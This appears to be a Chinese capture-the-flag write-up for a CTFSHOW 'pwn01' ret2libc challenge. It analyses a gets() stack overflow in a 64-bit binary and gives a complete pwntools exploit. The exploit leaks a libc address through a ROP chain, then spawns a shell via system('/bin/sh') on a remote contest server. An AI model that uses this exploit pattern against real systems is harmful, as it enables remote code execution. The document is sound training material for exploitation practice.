>
>
CTFSHOW内部赛 pwn01_签到题
Surager
pwn01_签到题
$ file ret2libc_64
ret2libc_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=5413104184dd326a27fb848b31d780ff511099bb, not stripped
$ checksec ret2libc_64
[*] '/mnt/e/wsl/ret2libc_64'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)文件基本信息。保护机制开了NX。
流程分析:
一个输出,一个输入。
[Welcome CTFshow..]
now,Try Pwn Me?
asdfida分析:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+0h] [rbp-A0h]
setvbuf(_bss_start, 0LL, 1, 0LL);
write(1, "[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n", 0x24uLL);
gets(&v4, "[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n");
return 0;
}仅有main函数可利用。输入时使用gets,没有指定输入长度。可以进行栈溢出。
v4距离栈底0xA0字节。构造payload:
payload = 'a'*0xa0+'a'*0x8 + p64(rdi) + p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(main)由于没有找到pop rdx;ret,无法控制write出的字节数,只要大于6字节即可。
之后计算出偏移:
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc = LibcSearcher('write',leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')payload = 'a'*0xa0+'a'*0x8 + p64(rdi)+p64(binsh)+p64(system)完整exp:
from pwn import *
from LibcSearcher import *
io = remote('124.156.121.112',28020)
elf = ELF('./ret2libc_64')
context.log_level = 'debug'
rdi = 0x00000000004006c3
rsi_r15 = 0x00000000004006c1
main = 0x4005FD
payload = 'a'*0xa0+'a'*0x8 + p64(rdi) + p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(main)
io.sendline(payload)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc = LibcSearcher('write',leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
payload = 'a'*0xa0+'a'*0x8 + p64(rdi)+p64(binsh)+p64(system)
io.recvuntil('Me?\n')
io.sendline(payload)
io.interactive()summerN
tql
13901583376
本职是ret2csu
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论